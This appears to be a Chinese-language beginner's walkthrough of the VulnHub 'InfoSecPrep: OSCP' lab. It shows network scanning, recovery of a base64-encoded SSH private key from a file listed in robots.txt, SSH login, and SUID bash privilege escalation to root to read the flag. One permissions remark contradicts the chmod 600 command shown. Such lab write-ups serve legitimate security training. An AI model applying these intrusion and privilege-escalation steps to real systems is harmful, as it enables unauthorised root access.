适合新手做的靶场
休息了一段时间,该醒醒接着打靶了
这一次的靶场操作不多,比较简单,比较适合像我这种小白来玩
# 一、环境搭建
# 准备工具
kali
靶机
# 靶机下载地址
- oscp.zip (Size: 2.8 GB)
- Download: https://drive.google.com/file/d/1q6Y86DZ-IU2wApmsW8Puo2xFll_9ISNL/view?usp=sharing
- Download (Mirror): https://download.vulnhub.com/infosecprep/oscp.zip
# 安装过程
解压得到文件
用 Vmware 虚拟机打开此文件
将 kali 和靶机的网络连接模式都改成 NAT 模式,不然 kali 扫不出靶机的 ip
# 二、渗透过程
攻击机 (kali) ip:192.168.112.130
靶机 (OSCP) ip:192.168.112.133
# 信息收集
arp-scan -l
探测出靶机 ip
nmap -sV -p- 192.168.112.133
直接扫开放端口
发现开放 22
80
端口,先打开浏览器探测 80
端口有什么信息
Oh yea! Almost forgot the only user on this box is “oscp”.
可以看到这里提示用户名只有 oscp
先照例给他做个目录扫描探测下藏有什么文件
扫出很多东西,我们主要看 robots.txt
发现这个奇怪的文本,继续访问
这是一段编码,看到最后 == 结尾特征,判断为 base64,解码得到一串私钥
想起了之前扫出的开放端口就有 22
端口,还有用户名 oscp
# 登陆
将私钥编辑到文件里,并给予权限
这里给 777 权限,是因为权限给太高了
chmod 600 rsa_key | |
ssh -i rsa_key oscp@192.168.112.133 |
这样就成功连接上了,发现还只是个普通用户的权限
# 提权
这里我们查找一下哪些工具具有 root 权限
find / -perm -u=s 2>/dev/null |
可以看到有个 bash
,利用 SUID 提权
SUID 提权
-bash-5.0$ /usr/bin/bash -p | |
bash-5.0# whoami | |
root | |
bash-5.0# cd /root | |
bash-5.0# ls | |
fix-wordpress flag.txt snap | |
bash-5.0# cat flag.txt | |
d73b04b0e696b0945283defa3eee4538 | |
bash-5.0# |
成功拿到 flag